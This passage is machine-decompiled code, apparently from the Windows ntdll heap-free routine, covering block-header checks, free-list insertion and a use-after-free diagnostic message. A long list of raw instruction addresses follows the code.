																			 *( *((intOrPtr*)(_v32 + 0x1c)) + (_t1242 >> 5) * 4) =  *( *((intOrPtr*)(_v32 + 0x1c)) + (_t1242 >> 5) * 4) &  !(1 << _v44);
																		} else {
																			_t1247 =  *(_t1305 - 8);
																			_v292 = _t1247;
																			__eflags =  *(_t1280 + 0x4c);
																			if( *(_t1280 + 0x4c) != 0) {
																				_t1247 = _t1247 ^  *(_t1280 + 0x50);
																				_v72 = _t1247;
																				_v292 = _t1247;
																				__eflags = _t1247 >> 0x18 - (_t1247 >> 0x00000010 ^ _t1247 >> 0x00000008 ^ _t1247);
																				if(_t1247 >> 0x18 != (_t1247 >> 0x00000010 ^ _t1247 >> 0x00000008 ^ _t1247)) {
																					E1F085FED(3, _t1280, _t1305 - 8, 0, 0, 0);
																					_t1247 = _v72;
																				}
																				_t1091 = _v32;
																			}
																			_t1249 = _v80 - (_t1247 & 0x0000ffff);
																			__eflags = _t1249;
																			_v240 = _t1249;
																			if(_t1249 != 0) {
																				_t1242 = _v44;
																				goto L169;
																			} else {
																				 *(_v84 +  *((intOrPtr*)(_t1091 + 0x20))) = _t1305;
																			}
																		}
																	}
																}
																L164:
																_t1286 = _v36;
																goto L165;
															}
															_v124 = _t878;
															_t1303 = _t878;
															goto L149;
														}
														L165:
														_t858 = _v104;
														_t1092 = _v128;
														 *_t1092 = _t858;
														_t858[2] = _t1092;
														__eflags =  *(_t1286 + 2) & 0x00000008;
														if(( *(_t1286 + 2) & 0x00000008) == 0) {
															L175:
															_t1093 =  *(_t1286 + 2);
															__eflags = _t1093 & 0x00000004;
															if((_t1093 & 0x00000004) != 0) {
																_t1301 = ( *_t1286 & 0x0000ffff) * 8 - 0x10;
																_v196 = _t1301;
																__eflags = _t1093 & 0x00000002;
																if((_t1093 & 0x00000002) != 0) {
																	__eflags = _t1301 - 4;
																	if(_t1301 > 4) {
																		_t1301 = _t1301 - 4;
																		__eflags = _t1301;
																		_v196 = _t1301;
																	}
																}
																_t865 = E1F0180A0(_v36 + 0x10, _t1301, 0xfeeefeee);
																_v72 = _t865;
																__eflags = _t865 - _t1301;
																if(_t865 == _t1301) {
																	_t1286 = _v36;
																} else {
																	_t1097 =  *[fs:0x30];
																	__eflags =  *(_t1097 + 0xc);
																	if( *(_t1097 + 0xc) == 0) {
																		_push("HEAP: ");
																		E1EFBB910();
																	} else {
																		E1EFBB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																	}
																	_t1286 = _v36;
																	_push(_v72 + 0x10 + _t1286);
																	E1EFBB910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t1286);
																	_t871 =  *[fs:0x30];
																	__eflags =  *((char*)(_t871 + 2));
																	if( *((char*)(_t871 + 2)) != 0) {
																		 *0x1f0b47a1 = 1;
																		 *0x1f0b4100 = _t1286;
																		asm("int3");
																		 *0x1f0b47a1 = 0;
																	}
																}
															}
															 *(_t1019 + 2) = 0;
															 *((char*)(_t1019 + 7)) = 0;
															_t1095 = _v48 + ( *_t1286 & 0x0000ffff);
															_v48 = _t1095;
															 *_t1019 = _t1095;
															_t1096 = _v48;
															_t861 =  *(_t1280 + 0x54) ^ _t1096;
															__eflags = _t861;
															 *(_t1019 + 4 + _t1096 * 8) = _t861;
															_t1195 = _v48;
														} else {
															_t875 = E1EFBF5C7(_t1280, _t1286);
															__eflags = _t875;
															if(_t875 != 0) {
																goto L175;
															} else {
																E1EFBF113(_t1280, _t1286,  *_t1286 & 0x0000ffff, 1);
																L192:
																_t1195 = _v48;
																continue;
															}
														}
													}
												}
												break;
											}
											L187:
											_a4 = _t1019;
											goto L188;
										}
									}
									goto L112;
								}
								L188:
								__eflags = _t1195 -  *((intOrPtr*)(_t1280 + 0x6c));
								if(_t1195 <  *((intOrPtr*)(_t1280 + 0x6c))) {
									L193:
									__eflags =  *(_t1280 + 0x74) + _t1195 -  *((intOrPtr*)(_t1280 + 0x70));
									if( *(_t1280 + 0x74) + _t1195 <=  *((intOrPtr*)(_t1280 + 0x70))) {
										L197:
										__eflags = _t1195 - 0xfe00;
										if(_t1195 > 0xfe00) {
											_t1196 = _t1019;
											_t1045 = _t1280;
											E1EFD0B10(_t1045, _t1196, _t1195);
										} else {
											__eflags = _v37;
											if(_v37 == 0) {
												_t1291 = _t1195 & 0x0000ffff;
												 *(_t1019 + 2) =  *(_t1019 + 2) & 0x000000f0;
												 *((char*)(_t1019 + 7)) = 0;
												__eflags =  *(_t1280 + 0x40) & 0x00000040;
												if(( *(_t1280 + 0x40) & 0x00000040) != 0) {
													E1F018140(_t1019 + 0x10, _t1291 * 8 - 0x10, 0xfeeefeee);
													_t577 = _t1019 + 2;
													 *_t577 =  *(_t1019 + 2) | 0x00000004;
													__eflags =  *_t577;
												}
												_t760 = _t1280 + 0xc0;
												__eflags =  *(_t1280 + 0xb4);
												if( *(_t1280 + 0xb4) == 0) {
													_t1199 =  *_t760;
												} else {
													_t1199 = E1EFC1C0E(_t1280, _t1291);
													_t760 = _t1280 + 0xc0;
												}
												while(1) {
													__eflags = _t760 - _t1199;
													if(_t760 == _t1199) {
														break;
													}
													__eflags =  *(_t1280 + 0x4c);
													if( *(_t1280 + 0x4c) == 0) {
														_t1051 =  *(_t1199 - 8);
														_v110 = _t1051;
													} else {
														_t1051 =  *(_t1199 - 8);
														_v100 = _t1051;
														__eflags =  *(_t1280 + 0x4c) & _t1051;
														if(( *(_t1280 + 0x4c) & _t1051) != 0) {
															_t1051 = _t1051 ^  *(_t1280 + 0x50);
															__eflags = _t1051;
															_v100 = _t1051;
														}
														_v110 = _t1051;
														_t1019 = _a4;
													}
													__eflags = _t1291 - (_t1051 & 0x0000ffff);
													if(_t1291 > (_t1051 & 0x0000ffff)) {
														_t1199 =  *_t1199;
														_t760 = _t1280 + 0xc0;
														continue;
													}
													break;
												}
												_t761 = _t1019 + 8;
												_t1045 =  *(_t1199 + 4);
												_t1286 =  *_t1045;
												__eflags = _t1286 - _t1199;
												if(_t1286 != _t1199) {
													__eflags = 0;
													_t1045 = 0xd;
													E1F085FED(0xd, 0, _t1199, 0, _t1286, 0);
												} else {
													 *_t761 = _t1199;
													 *(_t761 + 4) = _t1045;
													 *_t1045 = _t761;
													 *(_t1199 + 4) = _t761;
												}
												 *(_t1280 + 0x74) =  *(_t1280 + 0x74) + ( *_t1019 & 0x0000ffff);
												_t1196 =  *(_t1280 + 0xb4);
												__eflags = _t1196;
												if(_t1196 != 0) {
													_t1050 =  *_t1019 & 0x0000ffff;
													while(1) {
														_t768 =  *(_t1196 + 4);
														__eflags = _t1050 - _t768;
														if(_t1050 < _t768) {
															break;
														}
														_t1286 =  *_t1196;
														__eflags = _t1286;
														if(_t1286 != 0) {
															_t1196 = _t1286;
															continue;
														} else {
															_t1050 = _t768 - 1;
														}
														break;
													}
													_v208 = _t1050;
													_t1045 = _t1280;
													E1EFC1B5D(_t1045, _t1196, 1, _t1019 + 8, _t1050,  *_t1019 & 0x0000ffff);
												}
											} else {
												_t777 = _t1195 & 0x0000ffff;
												_v32 = _t777;
												 *(_t1019 + 2) = 0;
												 *((char*)(_t1019 + 7)) = 0;
												_t1202 = _t1280 + 0xc0;
												_t1292 =  *(_t1280 + 0xb4);
												_v44 = _t1292;
												__eflags = _t1292;
												if(_t1292 == 0) {
													_t1053 =  *_t1202;
												} else {
													while(1) {
														_t1056 =  *((intOrPtr*)(_t1292 + 4));
														__eflags = _t777 - _t1056;
														if(_t777 < _t1056) {
															goto L203;
														}
														_t842 =  *_t1292;
														__eflags = _t842;
														if(_t842 != 0) {
															_t1292 = _t842;
															_v44 = _t1292;
															_t777 = _v32;
															continue;
														} else {
															_t777 = _t1056 - 1;
															while(1) {
																L203:
																_v52 = _t777;
																_v144 = _t777;
																_v36 = _t777 -  *(_t1292 + 0x14);
																_v96 = 0;
																_t1215 =  *(_t1292 + 0x18);
																_v80 = _t1215;
																_t801 =  *((intOrPtr*)(_t1215 + 4));
																__eflags = _t1215 - _t801;
																if(_t1215 != _t801) {
																	goto L205;
																}
																_t1053 = _t1215;
																L244:
																__eflags = _t1053;
																if(_t1053 == 0) {
																	L247:
																	_t1292 =  *_t1292;
																	_v44 = _t1292;
																	_t777 =  *(_t1292 + 0x14);
																	continue;
																}
																_t1202 = _t1280 + 0xc0;
																goto L250;
																L205:
																_t802 = _t801 + 0xfffffff8;
																_v72 = _t802;
																_t1026 =  *_t802;
																_v300 = _t1026;
																__eflags =  *(_t1280 + 0x4c);
																if( *(_t1280 + 0x4c) != 0) {
																	_t1026 = _t1026 ^  *(_t1280 + 0x50);
																	_v300 = _t1026;
																	__eflags = _t1026 >> 0x18 - (_t1026 >> 0x00000010 ^ _t1026 >> 0x00000008 ^ _t1026);
																	if(_t1026 >> 0x18 != (_t1026 >> 0x00000010 ^ _t1026 >> 0x00000008 ^ _t1026)) {
																		E1F085FED(3, _t1280, _v72, 0, 0, 0);
																		_t1215 = _v80;
																	}
																}
																_t1058 = _v32 - (_t1026 & 0x0000ffff);
																_v244 = _t1058;
																__eflags = _t1058;
																if(_t1058 <= 0) {
																	_t805 =  *_t1215 + 0xfffffff8;
																	_v72 = _t805;
																	_t1027 =  *_t805;
																	_v308 = _t1027;
																	__eflags =  *(_t1280 + 0x4c);
																	if( *(_t1280 + 0x4c) != 0) {
																		_t1027 = _t1027 ^  *(_t1280 + 0x50);
																		_v308 = _t1027;
																		__eflags = _t1027 >> 0x18 - (_t1027 >> 0x00000010 ^ _t1027 >> 0x00000008 ^ _t1027);
																		if(_t1027 >> 0x18 != (_t1027 >> 0x00000010 ^ _t1027 >> 0x00000008 ^ _t1027)) {
																			E1F085FED(3, _t1280, _v72, 0, 0, 0);
																			_t1215 = _v80;
																		}
																	}
																	_t1060 = _v32 - (_t1027 & 0x0000ffff);
																	_v248 = _t1060;
																	__eflags = _t1060;
																	if(_t1060 > 0) {
																		__eflags =  *_t1292;
																		if( *_t1292 != 0) {
																			L228:
																			_t1061 = _v36;
																			_t1217 = _t1061 >> 5;
																			_v124 = ( *((intOrPtr*)(_t1292 + 4)) -  *(_t1292 + 0x14) >> 5) - 1;
																			_t812 =  *((intOrPtr*)(_t1292 + 0x1c)) + _t1217 * 4;
																			_t1030 = (_t1027 | 0xffffffff) << (_t1061 & 0x0000001f) &  *_t812;
																			__eflags = _t1030;
																			_t1063 = _v124;
																			while(1) {
																				_v200 = _t812;
																				_v140 = _t1217;
																				__eflags = _t1030;
																				if(_t1030 != 0) {
																					break;
																				}
																				__eflags = _t1217 - _t1063;
																				if(_t1217 > _t1063) {
																					__eflags = _t1030;
																					if(_t1030 == 0) {
																						_t1019 = _a4;
																						goto L247;
																					} else {
																						break;
																					}
																				} else {
																					_t812 =  &(_t812[1]);
																					_t1030 =  *_t812;
																					_t1217 = _t1217 + 1;
																					continue;
																				}
																				goto L244;
																			}
																			__eflags = _t1030;
																			if(_t1030 == 0) {
																				_t815 = _t1030 >> 0x00000010 & 0x000000ff;
																				__eflags = _t815;
																				if(_t815 == 0) {
																					_t817 = ( *((_t1030 >> 0x18) + 0x1ef989b0) & 0x000000ff) + 0x18;
																					__eflags = _t817;
																				} else {
																					_t817 = ( *(_t815 + 0x1ef989b0) & 0x000000ff) + 0x10;
																				}
																			} else {
																				_t820 = _t1030 & 0x000000ff;
																				__eflags = _t1030;
																				if(_t1030 == 0) {
																					_t817 = ( *((_t1030 >> 0x00000008 & 0x000000ff) + 0x1ef989b0) & 0x000000ff) + 8;
																				} else {
																					_t817 =  *(_t820 + 0x1ef989b0) & 0x000000ff;
																				}
																			}
																			_t1219 = (_t1217 << 5) + _t817;
																			_v140 = _t1219;
																			__eflags =  *(_t1292 + 8);
																			if( *(_t1292 + 8) != 0) {
																				_t1219 = _t1219 + _t1219;
																				__eflags = _t1219;
																			}
																			_t1053 =  *( *((intOrPtr*)(_t1292 + 0x20)) + _t1219 * 4);
																			goto L243;
																		} else {
																			__eflags = _v52 -  *((intOrPtr*)(_t1292 + 4)) - 1;
																			if(_v52 !=  *((intOrPtr*)(_t1292 + 4)) - 1) {
																				goto L228;
																			} else {
																				_t1069 = _v36;
																				__eflags =  *(_t1292 + 8);
																				if( *(_t1292 + 8) != 0) {
																					_t1069 = _t1069 + _t1069;
																					__eflags = _t1069;
																				}
																				_t1298 =  *( *((intOrPtr*)(_t1292 + 0x20)) + _t1069 * 4);
																				while(1) {
																					__eflags = _t1215 - _t1298;
																					if(_t1215 == _t1298) {
																						break;
																					}
																					_t1220 = _t1298 - 8;
																					_t1033 =  *(_t1298 - 8);
																					_v316 = _t1033;
																					__eflags =  *(_t1280 + 0x4c);
																					if( *(_t1280 + 0x4c) != 0) {
																						_t1033 = _t1033 ^  *(_t1280 + 0x50);
																						_v316 = _t1033;
																						__eflags = _t1033 >> 0x18 - (_t1033 >> 0x00000010 ^ _t1033 >> 0x00000008 ^ _t1033);
																						if(_t1033 >> 0x18 != (_t1033 >> 0x00000010 ^ _t1033 >> 0x00000008 ^ _t1033)) {
																							E1F085FED(3, _t1280, _t1220, 0, 0, 0);
																						}
																					}
																					_t1071 = _v32 - (_t1033 & 0x0000ffff);
																					_v252 = _t1071;
																					__eflags = _t1071;
																					if(_t1071 > 0) {
																						_t1298 =  *_t1298;
																						_t1215 = _v80;
																						continue;
																					} else {
																						_t1053 = _t1298;
																						_t1292 = _v44;
																					}
																					goto L243;
																				}
																				_t1053 = _v96;
																				_t1292 = _v44;
																				goto L243;
																			}
																		}
																	} else {
																		_t1053 =  *_t1215;
																		goto L243;
																	}
																} else {
																	_t1053 = _t1215;
																	L243:
																	_t1019 = _a4;
																}
																goto L244;
															}
														}
														goto L203;
													}
													goto L203;
												}
												L250:
												_t1293 = _v32;
												while(1) {
													__eflags = _t1202 - _t1053;
													if(_t1202 == _t1053) {
														break;
													}
													__eflags =  *(_t1280 + 0x4c);
													if( *(_t1280 + 0x4c) == 0) {
														_t1214 =  *(_t1053 - 8);
														_v108 = _t1214;
													} else {
														_t1214 =  *(_t1053 - 8);
														_v76 = _t1214;
														__eflags =  *(_t1280 + 0x4c) & _t1214;
														if(( *(_t1280 + 0x4c) & _t1214) != 0) {
															_t1214 = _t1214 ^  *(_t1280 + 0x50);
															__eflags = _t1214;
															_v76 = _t1214;
														}
														_v108 = _t1214;
														_t1019 = _a4;
													}
													__eflags = _t1293 - (_t1214 & 0x0000ffff);
													if(_t1293 > (_t1214 & 0x0000ffff)) {
														_t1053 =  *_t1053;
														_t1202 = _t1280 + 0xc0;
														continue;
													}
													break;
												}
												_t1196 = _t1019 + 8;
												_v96 = _t1196;
												_t778 =  *(_t1053 + 4);
												_t1286 =  *_t778;
												__eflags = _t1286 - _t1053;
												if(_t1286 != _t1053) {
													_t1196 = 0;
													__eflags = 0;
													_t513 = _t1196 + 0xd; // 0xd
													E1F085FED(_t513, 0, _t1053, 0, _t1286, 0);
												} else {
													 *_t1196 = _t1053;
													 *(_t1196 + 4) = _t778;
													 *_t778 = _t1196;
													 *(_t1053 + 4) = _t1196;
												}
												 *(_t1280 + 0x74) =  *(_t1280 + 0x74) + ( *_t1019 & 0x0000ffff);
												_t1045 =  *(_t1280 + 0xb4);
												_v52 = _t1045;
												__eflags = _t1045;
												if(_t1045 != 0) {
													_t1294 =  *_t1019 & 0x0000ffff;
													while(1) {
														_t1203 =  *((intOrPtr*)(_t1045 + 4));
														__eflags = _t1294 - _t1203;
														if(_t1294 < _t1203) {
															break;
														}
														_t798 =  *_t1045;
														__eflags = _t798;
														if(_t798 != 0) {
															_t1045 = _t798;
															_v52 = _t1045;
															continue;
														} else {
															_t1294 = _t1203 - 1;
														}
														break;
													}
													_v204 = _t1294;
													_v72 =  *_t1019 & 0x0000ffff;
													_t1205 = _t1294 -  *((intOrPtr*)(_t1045 + 0x14));
													_v32 = _t1205;
													__eflags =  *(_t1045 + 8);
													_t782 = _t1205 + _t1205;
													if( *(_t1045 + 8) == 0) {
														_t782 = _t1205;
													}
													 *((intOrPtr*)(_t1045 + 0xc)) =  *((intOrPtr*)(_t1045 + 0xc)) + 1;
													_v56 = _t782 << 2;
													_v84 =  *((intOrPtr*)(_v56 +  *((intOrPtr*)(_t1045 + 0x20))));
													__eflags = _t1294 -  *((intOrPtr*)(_t1045 + 4)) - 1;
													_t1196 = _v32;
													if(_t1294 ==  *((intOrPtr*)(_t1045 + 4)) - 1) {
														_t535 = _t1045 + 0x10;
														 *_t535 =  *(_t1045 + 0x10) + 1;
														__eflags =  *_t535;
													}
													_t1295 = _v84;
													__eflags = _t1295;
													if(_t1295 == 0) {
														L277:
														_t788 =  *((intOrPtr*)(_t1045 + 0x20));
														_t1045 = _v56;
														 *(_t1045 + _t788) = _v96;
														_t1286 = _v84;
													} else {
														_t1023 =  *(_t1295 - 8);
														_v324 = _t1023;
														__eflags =  *(_t1280 + 0x4c);
														if( *(_t1280 + 0x4c) != 0) {
															_t1023 = _t1023 ^  *(_t1280 + 0x50);
															_v324 = _t1023;
															__eflags = _t1023 >> 0x18 - (_t1023 >> 0x00000010 ^ _t1023 >> 0x00000008 ^ _t1023);
															if(_t1023 >> 0x18 != (_t1023 >> 0x00000010 ^ _t1023 >> 0x00000008 ^ _t1023)) {
																E1F085FED(3, _t1280, _t1295 - 8, 0, 0, 0);
																_t1045 = _v52;
															}
															_t1196 = _v32;
														}
														_t1025 = _v72 - (_t1023 & 0x0000ffff);
														_v256 = _t1025;
														__eflags = _t1025;
														_t1019 = _a4;
														if(_t1025 <= 0) {
															goto L277;
														}
													}
													__eflags = _t1286;
													if(_t1286 == 0) {
														_t1286 = _t1196 >> 5;
														_v32 = _t1196 & 0x0000001f;
														_t1045 = _v32;
														_t1196 = 1 << _t1045;
														_t790 =  *((intOrPtr*)(_v52 + 0x1c));
														_t558 = _t790 + _t1286 * 4;
														 *_t558 =  *(_t790 + _t1286 * 4) | 0x00000001;
														__eflags =  *_t558;
													}
												}
											}
											__eflags =  *(_t1280 + 0x4c);
											if( *(_t1280 + 0x4c) != 0) {
												 *(_t1019 + 3) =  *(_t1019 + 2) ^  *(_t1019 + 1) ^  *_t1019;
												 *_t1019 =  *_t1019 ^  *(_t1280 + 0x50);
											}
										}
										_t1197 = _t1196 | 0xffffffff;
										__eflags = _v64;
										if(_v64 != 0) {
											__eflags =  *(_t1280 + 0x4c);
											if( *(_t1280 + 0x4c) != 0) {
												 *_t1019 =  *_t1019 ^  *(_t1280 + 0x50);
												__eflags =  *(_t1019 + 3) - ( *(_t1019 + 2) ^  *(_t1019 + 1) ^  *_t1019);
												if(__eflags != 0) {
													_push(_t1045);
													_t1197 = _t1019;
													E1F07D646(_t1019, _t1280, _t1197, _t1280, _t1286, __eflags);
												}
											}
											_t1047 =  *(_t1019 + 2) | 0x00000002;
											 *(_t1019 + 2) = _t1047;
											_t1290 = _t1019 + ( *_t1019 & 0x0000ffff) * 8;
											__eflags =  *(_t1280 + 0x4c);
											if( *(_t1280 + 0x4c) != 0) {
												 *(_t1019 + 3) =  *(_t1019 + 1) ^ _t1047 ^  *_t1019;
												 *_t1019 =  *_t1019 ^  *(_t1280 + 0x50);
												__eflags =  *_t1019;
											}
											 *((short*)(_t1290 - 4)) = _v64;
											 *((short*)(_t1290 - 2)) = 0;
											__eflags =  *(_t1280 + 0x40) & 0x08000000;
											if(( *(_t1280 + 0x40) & 0x08000000) != 0) {
												 *((short*)(_t1290 - 2)) = E1EFEFDB9(1, _t1197);
											}
											goto L315;
										}
									} else {
										__eflags = _t1195 - 0x200;
										if(_t1195 < 0x200) {
											goto L197;
										} else {
											__eflags =  *(_t1280 + 0x54) -  *(_t1019 + 4);
											if( *(_t1280 + 0x54) !=  *(_t1019 + 4)) {
												goto L197;
											} else {
												_t1197 = _t1019;
												E1EFBF113(_t1280, _t1197, _t1195, 0);
												_v64 = 0;
												goto L315;
											}
										}
									}
								} else {
									__eflags =  *(_t1280 + 0x74) + _t1195 -  *((intOrPtr*)(_t1280 + 0x70));
									if( *(_t1280 + 0x74) + _t1195 <  *((intOrPtr*)(_t1280 + 0x70))) {
										goto L193;
									} else {
										_t1197 = _t1019;
										E1EFBF113(_t1280, _t1197, _t1195, 0);
										L315:
										__eflags = _t1197 | 0xffffffff;
									}
								}
								_t1288 = 0;
								_a4 = 0;
							}
						} else {
							_t1175 =  *(_t1280 + 0xc8);
							_t1191 =  *[fs:0x18];
							asm("lock btr dword [eax], 0x0");
							if(__eflags >= 0) {
								__eflags =  *((intOrPtr*)(_t1175 + 0xc)) -  *((intOrPtr*)(_t1191 + 0x24));
								if( *((intOrPtr*)(_t1175 + 0xc)) !=  *((intOrPtr*)(_t1191 + 0x24))) {
									_v132 = 0;
									__eflags =  *0x1f0b5da8;
									if( *0x1f0b5da8 == 0) {
										E1EFCFED0( *(_t1280 + 0xc8));
										_t1175 = _t1280;
										E1EFF9CEB(_t1175, 1);
										goto L24;
									} else {
										_v85 = 0;
										 *((intOrPtr*)( *[fs:0x18] + 0xbf4)) = 0xc0000194;
										_t1319 =  *[fs:0x18];
										_v224 = _t1319;
										 *((intOrPtr*)(_t1319 + 0x34)) = E1EFEABA0(0xc0000194);
										_v156 = 0;
										_t1288 = 0;
										_a4 = 0;
										L350:
										__eflags = _t1191 | 0xffffffff;
									}
								} else {
									 *(_t1175 + 8) =  *(_t1175 + 8) + 1;
									_v132 = 1;
									 *((intOrPtr*)(_t1280 + 0x214)) =  *((intOrPtr*)(_t1280 + 0x214)) + 1;
									goto L24;
								}
							} else {
								 *((intOrPtr*)(_t1175 + 0xc)) =  *((intOrPtr*)(_t1191 + 0x24));
								 *(_t1175 + 8) = 1;
								_v132 = 1;
								 *((intOrPtr*)(_t1280 + 0x214)) =  *((intOrPtr*)(_t1280 + 0x214)) + 1;
								L24:
								_v85 = 1;
								_v38 = 1;
								_t1019 = _a4;
								__eflags =  *(_t1280 + 0x4c);
								if( *(_t1280 + 0x4c) != 0) {
									 *_t1019 =  *_t1019 ^  *(_t1280 + 0x50);
									__eflags =  *(_t1019 + 3) - ( *(_t1019 + 2) ^  *(_t1019 + 1) ^  *_t1019);
									if(__eflags != 0) {
										_push(_t1175);
										E1F07D646(_t1019, _t1280, _t1019, _t1280, _t1285, __eflags);
									}
								}
								_t1176 =  *_t1019 & 0x0000ffff;
								_t998 =  *(_t1280 + 0xb4);
								while(1) {
									_t1318 =  *((intOrPtr*)(_t998 + 4));
									__eflags = _t1176 - _t1318;
									if(_t1176 < _t1318) {
										_v160 = _t1176;
										_t1275 = _t1176;
										break;
									}
									_t1274 =  *_t998;
									__eflags = _t1274;
									if(_t1274 != 0) {
										_t998 = _t1274;
										continue;
									} else {
										_t1275 = _t1318 - 1;
										_v160 = _t1275;
									}
									break;
								}
								__eflags = _t1275 - _t1318;
								if(_t1275 >= _t1318) {
									L37:
									_v136 = 0;
								} else {
									__eflags = _t1176 - _t1275;
									if(_t1176 != _t1275) {
										goto L37;
									} else {
										_t1177 = _t1176 -  *((intOrPtr*)(_t998 + 0x14));
										__eflags =  *(_t998 + 8);
										if( *(_t998 + 8) != 0) {
											_t1177 = _t1177 + _t1177;
											__eflags = _t1177;
										}
										_v136 =  *((intOrPtr*)(_t998 + 0x20)) + _t1177 * 4;
									}
								}
								goto L42;
							}
						}
						_v8 = 0xfffffffe;
						E1EFD5050(_t1280, _t1288);
						 *[fs:0x0] = _v20;
						return _v156;
					} else {
						_v37 = 0;
						_t1285 = 4;
						__eflags = _t1188 & 0x61000000;
						if((_t1188 & 0x61000000) == 0) {
							goto L7;
						} else {
							__eflags = _t1188 & 0x10000000;
							if(__eflags != 0) {
								goto L7;
							} else {
								_t1015 = E1F06F8F8(_t1018, __ecx, _t1188, __ecx, 4, __eflags, _a8);
								 *[fs:0x0] = _v20;
								return _t1015;
							}
						}
					}
				} else {
					E1F085FED(9, __ecx, _t690, 0, 0, 0);
					 *[fs:0x0] = _v20;
					return 0;
				}
			}

0x1efd3c60
0x1efd3c65
0x1efd3c67
0x1efd3c6c
0x1efd3c77
0x1efd3c78
0x1efd3c7e
0x1efd3c81
0x1efd3c86
0x1efd3c8b
0x1efd3c8f
0x1efd3c95
0x1efd3c97
0x1efd3c9d
0x1efd3ca1
0x1efd3ca5
0x1efd3caf
0x1efd3cb9
0x1efd3cc0
0x1efd3cc7
0x1efd3cd3
0x1efd3cd7
0x1efd3cdc
0x1efd3d07
0x1efd3d0a
0x1efd3d0d
0x1efd3d13
0x1efd3d4a
0x1efd3d4f
0x1efd3d55
0x1efd3d58
0x1efd3d5a
0x1efd3d71
0x1efd3d71
0x1efd3d5c
0x1efd3d5c
0x1efd3d5f
0x00000000
0x1efd3d61
0x1efd3d6a
0x1efd3d6a
0x1efd3d5f
0x1efd3d76
0x1efd3d79
0x1efd3db4
0x1efd3db4
0x1efd3d7b
0x1efd3d7b
0x1efd3d81
0x1efd3d88
0x00000000
0x1efd3d8a
0x1efd3d96
0x1efd3d9d
0x1efd3d9f
0x1efd3da2
0x1efd3da8
0x1efd3daa
0x1efd3daf
0x1efd3daf
0x1efd3da2
0x1efd3d88
0x1efd3db7
0x1efd3dbe
0x1efd3dc1
0x1efd3f07
0x1efd3f0b
0x1efd3f10
0x1efd3f1a
0x1efd3f1d
0x1efd3f1f
0x1efd3f24
0x1efd3f24
0x1efd3f1d
0x1efd3f29
0x1efd3f29
0x1efd3f2c
0x1efd3f2e
0x1efd3f30
0x1efd3f32
0x1efd3f32
0x1efd3f34
0x1efd3f34
0x1efd3f36
0x1efd3f3a
0x1efd4e3d
0x1efd4e40
0x1efd4e43
0x1efd4e46
0x1efd4e53
0x1efd4e56
0x1efd4e5c
0x1efd4e5e
0x1efd4e61
0x1efd4e63
0x1efd4e66
0x1efd4e68
0x1efd4e75
0x1efd4e7a
0x1efd4e7c
0x1efd4e7f
0x1efd4e6a
0x1efd4e6a
0x1efd4e6c
0x00000000
0x1efd4e6e
0x1efd4e6e
0x1efd4e70
0x1efd4e70
0x1efd4e6c
0x1efd4e84
0x1efd4e88
0x1efd4e90
0x1efd4e93
0x1efd4e99
0x1efd4e9e
0x1efd4ea7
0x1efd4eb2
0x1efd4eb4
0x1efd4eb4
0x1efd4e9e
0x1efd4eb9
0x1efd4ebb
0x1efd4ebe
0x1efd4ec2
0x1efd4ec4
0x1efd4eca
0x1efd4ecf
0x1efd4ecf
0x1efd4ed6
0x1efd4ed9
0x1efd4edf
0x1efd4ee4
0x1efd4ee6
0x1efd4f01
0x1efd4ee8
0x1efd4ef1
0x1efd4ef6
0x1efd4ef9
0x1efd4ef9
0x1efd4f06
0x1efd4f09
0x1efd4f11
0x1efd4f11
0x1efd4f16
0x1efd4f26
0x1efd4f2e
0x1efd4f34
0x1efd4f39
0x1efd4f3b
0x1efd4f50
0x1efd4f3d
0x1efd4f46
0x1efd4f4b
0x1efd4f4b
0x1efd4f55
0x1efd4f58
0x1efd4f5a
0x1efd4f60
0x1efd4f67
0x1efd4f69
0x1efd4f6e
0x1efd4f70
0x1efd4f82
0x1efd4f72
0x1efd4f7b
0x1efd4f7b
0x1efd4f92
0x1efd4f9c
0x1efd4fa1
0x1efd4fa1
0x1efd4fa6
0x1efd4fa6
0x1efd4fa9
0x1efd4fae
0x1efd4fb0
0x1efd4fc5
0x1efd4fb2
0x1efd4fbb
0x1efd4fc0
0x1efd4fc0
0x1efd4fca
0x1efd4fcd
0x1efd4fcf
0x1efd4fd4
0x1efd4fd6
0x1efd4feb
0x1efd4fd8
0x1efd4fe1
0x1efd4fe6
0x1efd4fe6
0x1efd4ffb
0x1efd5005
0x1efd500a
0x1efd500a
0x1efd5012
0x1efd5012
0x1efd5015
0x00000000
0x1efd3f40
0x1efd3f40
0x1efd3f43
0x1efd3f4a
0x1efd3f51
0x1efd3f60
0x1efd3f62
0x1efd3f65
0x1efd3f67
0x1efd3f72
0x1efd3f75
0x1efd3f78
0x1efd3f7b
0x1efd3f7d
0x1efd3f7d
0x1efd3f7e
0x1efd3f7e
0x1efd3f7b
0x1efd3f67
0x1efd3f81
0x1efd3f85
0x1efd3f8d
0x1efd3f90
0x1efd3f96
0x1efd3f99
0x1efd3f9e
0x1efd3fa0
0x1efd3fa2
0x1efd3fa4
0x1efd3fa7
0x1efd3fbe
0x1efd3fc1
0x1efd3fc4
0x1efd3fc7
0x1efd3fa9
0x1efd3fa9
0x1efd3faf
0x1efd3fb2
0x1efd3fb8
0x1efd3fb8
0x1efd3fca
0x1efd3fd2
0x1efd3fd2
0x1efd3f9e
0x1efd3fd6
0x1efd3fd9
0x1efd3fdc
0x1efd3fe2
0x1efd3fe6
0x1efd3fec
0x1efd3ff0
0x1efd4005
0x1efd4007
0x1efd400a
0x1efd400c
0x1efd4012
0x1efd401d
0x1efd4020
0x1efd4022
0x1efd4028
0x1efd402a
0x1efd402f
0x1efd4031
0x1efd403f
0x1efd4044
0x1efd4046
0x1efd4048
0x1efd404d
0x1efd404d
0x1efd4046
0x1efd4052
0x1efd4055
0x1efd4058
0x1efd405a
0x1efd405d
0x1efd4060
0x1efd4063
0x1efd4065
0x1efd4068
0x1efd406a
0x1efd4310
0x1efd431c
0x1efd4070
0x1efd4070
0x1efd4072
0x00000000
0x1efd4078
0x1efd407b
0x1efd407e
0x1efd4084
0x1efd4087
0x1efd4089
0x1efd408f
0x1efd4092
0x1efd4095
0x1efd4095
0x1efd4098
0x00000000
0x00000000
0x1efd409a
0x1efd409c
0x1efd409e
0x1efd4220
0x1efd4222
0x00000000
0x1efd40a4
0x1efd40a7
0x1efd40a7
0x1efd40a7
0x00000000
0x1efd409e
0x1efd40a8
0x1efd40ae
0x1efd40b3
0x1efd40b6
0x1efd40b9
0x1efd40bd
0x1efd40c0
0x1efd40c2
0x1efd40c2
0x1efd40c4
0x1efd40cb
